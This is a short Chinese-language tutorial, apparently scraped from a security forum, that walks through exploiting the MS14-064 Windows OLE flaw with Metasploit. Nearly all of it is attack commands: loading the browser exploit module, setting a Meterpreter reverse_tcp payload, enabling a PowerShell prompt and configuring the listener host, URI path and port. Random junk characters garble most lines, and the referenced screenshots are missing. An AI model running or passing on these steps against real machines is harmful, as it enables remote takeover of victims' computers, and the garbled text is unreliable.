# p0 `6 K* T0 q$ d3 A/ ^ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
1 `* T! E0 d s* M; m
5 Y% s, P4 C) q: U; V
! q* A# `$ ~; @( X1 G! l4 S 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
% ^$ B2 i9 ]8 f) m8 t0 d
) B+ |5 K2 K( r! V( L
! @! \* [) A3 H( [% t% G1 Z 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
) V6 N, C, J' V' @
" s2 }1 R1 N7 T3 v' y+ q. F5 @
/ l' q; z% p7 A- M set AllowPowershellPrompt true
8 i0 U% k- x7 B( a1 J1 H) e
3 Z( u+ C8 k n1 S- G& a: O: M8 l) f
Set LHOST 192.168.0.109 }" H) w7 `1 @! q; v1 o
. B9 i# I: [- A' n; ~1 G& Y' ^# s. i. r8 u( i e1 G" O/ x
set SRVHOST 192.168.0.109
; J# {6 {$ N9 ?
: b, p$ `1 z/ ~! V
5 }* C0 M9 v3 R' F- t, D Set uripath share* q& ?& W) O3 N5 P9 J! H0 X3 y
* t9 U2 q7 b' y2 L, b* I+ j, \* S) Z
R' V" x6 f% y7 K0 n, p7 ?' a Set srvport 80" b* l# \! X, |# v) |- |$ f
% m3 A0 u6 M! {* Q& {' [# ^
$ `. v9 w8 ]6 z( t$ p9 ~
& ~* @: @6 u2 O' e' ^
& t' d2 ^0 @8 D, h: t0 T% ^2 o+ {' N. r% T
2 G) J3 e+ K" O' O
1 u' k+ N0 j7 ~$ W- l
x! P% s, a& y, V) M
$ E/ x8 e2 a. ^8 L( |# Q
* A/ i( o( W: b/ J1 i$ D
, ^3 R; U$ a+ k% h
* U% R/ q( g- b5 O
+ e( R2 a3 i9 o$ ?
" A2 q0 Y1 h- [! P9 l
5 I6 r: A8 m: E% }! `
7 l: X8 O F1 M$ B1 c8 R: e, z
4 x U% J5 c. r+ f8 I( \ 下面我们来访问本地地址如图:
/ [$ P; | G7 R* F5 S
3 X/ k: |" J. E1 J' F
" D2 X$ ?2 v/ U; s1 x+ ] 8 {2 L+ B7 y* ^; Q% `* ~( v
" d" T2 y% W- V" _0 S
! A0 h7 K$ l8 g0 A' }
8 q6 c/ b' w6 e
' _0 t+ Y b/ Z. k
; h, P ?7 ?. N3 Z: e3 L; h# N- }
4 f; e! [) O# _) `" H4 s! i